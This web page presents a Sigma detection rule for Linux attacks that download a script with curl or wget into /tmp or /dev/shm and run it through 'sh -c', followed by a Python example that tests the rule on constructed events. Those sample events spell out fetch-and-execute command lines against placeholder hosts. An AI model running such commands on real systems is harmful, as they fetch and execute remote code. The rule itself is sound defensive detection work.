Suspicious Download and Execute Pattern via Curl/Wget
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
Sigma rule
```yaml
title: Suspicious Download and Execute Pattern via Curl/Wget
id: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
status: experimental
description: |
    Detects suspicious use of command-line tools such as curl or wget to download remote
    content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
    immediate execution, indicating potential malicious activity. This pattern is commonly used
    by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
references:
    - https://gtfobins.github.io/gtfobins/wget/
    - https://gtfobins.github.io/gtfobins/curl/
author: Aayush Gupta
date: 2025-06-17
tags:
    - attack.execution
    - attack.t1059.004
    - attack.t1203
logsource:
    category: process_creation
    product: linux
detection:
    selection_downloader:
        CommandLine|contains:
            - '/curl'
            - '/wget'
    selection_tmp:
        CommandLine|contains:
            - '/tmp/'
            - '/dev/shm/'
    selection_executor:
        CommandLine|contains: 'sh -c'
    condition: all of selection_*
falsepositives:
    - System update scripts using temporary files
    - Installer scripts or automated provisioning tools
level: high
```
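To see how the `all of selection_*` condition behaves on real telemetry, here is an added example (not part of the Sigma project or this rule) that applies the three selections to constructed Linux process_creation events; the event dicts, their `id` values and the field name `CommandLine` are assumptions made for the example.

```python
# Added example (not Sigma project code): evaluates this rule's detection
# logic against constructed process_creation events. Events are made up.

SELECTION_DOWNLOADER = ("/curl", "/wget")   # selection_downloader
SELECTION_TMP = ("/tmp/", "/dev/shm/")      # selection_tmp
SELECTION_EXECUTOR = "sh -c"                # selection_executor


def matches_rule(event: dict) -> bool:
    """condition: all of selection_*

    Each selection is a Sigma |contains test on CommandLine. Values in a
    list are OR-ed; the three selections are AND-ed, and all must match
    within the CommandLine of the same single event.
    """
    cmd = event.get("CommandLine", "")
    downloader = any(s in cmd for s in SELECTION_DOWNLOADER)
    tmp = any(s in cmd for s in SELECTION_TMP)
    executor = SELECTION_EXECUTOR in cmd
    return downloader and tmp and executor


def alert_ids(events: list) -> list:
    """Return the ids of the events that would raise an alert."""
    return [e["id"] for e in events if matches_rule(e)]


# Constructed sample events (not real telemetry); hostnames are placeholders.
SAMPLE_EVENTS = [
    # 1: fetch into /dev/shm and run it, all inside one 'sh -c' string -> alert
    {"id": 1, "Image": "/bin/sh",
     "CommandLine": 'sh -c "/usr/bin/curl -s http://example.invalid/a.sh -o /dev/shm/a.sh && sh /dev/shm/a.sh"'},
    # 2: provisioning tool staging an installer in /tmp via 'sh -c' -> alert,
    #    this is the falsepositives case the rule documents
    {"id": 2, "Image": "/bin/sh",
     "CommandLine": 'sh -c "/usr/bin/wget -q -O /tmp/setup.sh https://pkg.example.invalid/setup.sh && sh /tmp/setup.sh"'},
    # 3: the curl child process on its own: no 'sh -c' in this event -> no alert
    #    (the parent shell event is what matches, so correlate on the parent)
    {"id": 3, "Image": "/usr/bin/curl",
     "CommandLine": "/usr/bin/curl -s http://example.invalid/a.sh -o /dev/shm/a.sh"},
    # 4: ordinary API call: no temp directory, no 'sh -c' -> no alert
    {"id": 4, "Image": "/usr/bin/curl",
     "CommandLine": "/usr/bin/curl -s https://api.example.invalid/status"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], "ALERT" if matches_rule(ev) else "-", ev["CommandLine"])
```

Note that `'/curl'` and `'/wget'` require the path-qualified binary in the command line, so confirm how your log source populates `CommandLine` before relying on the rule.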
Related rules
- Antivirus Exploitation Framework Detection
- Potential Abuse of Linux Magic System Request Key
- Potential Exploitation of CVE-2025-4427/4428 Ivanti EPMM Pre-Auth RCE
- Potentially Suspicious Child Process of KeyScrambler.exe
- Suspicious Invocation of Shell via Rsync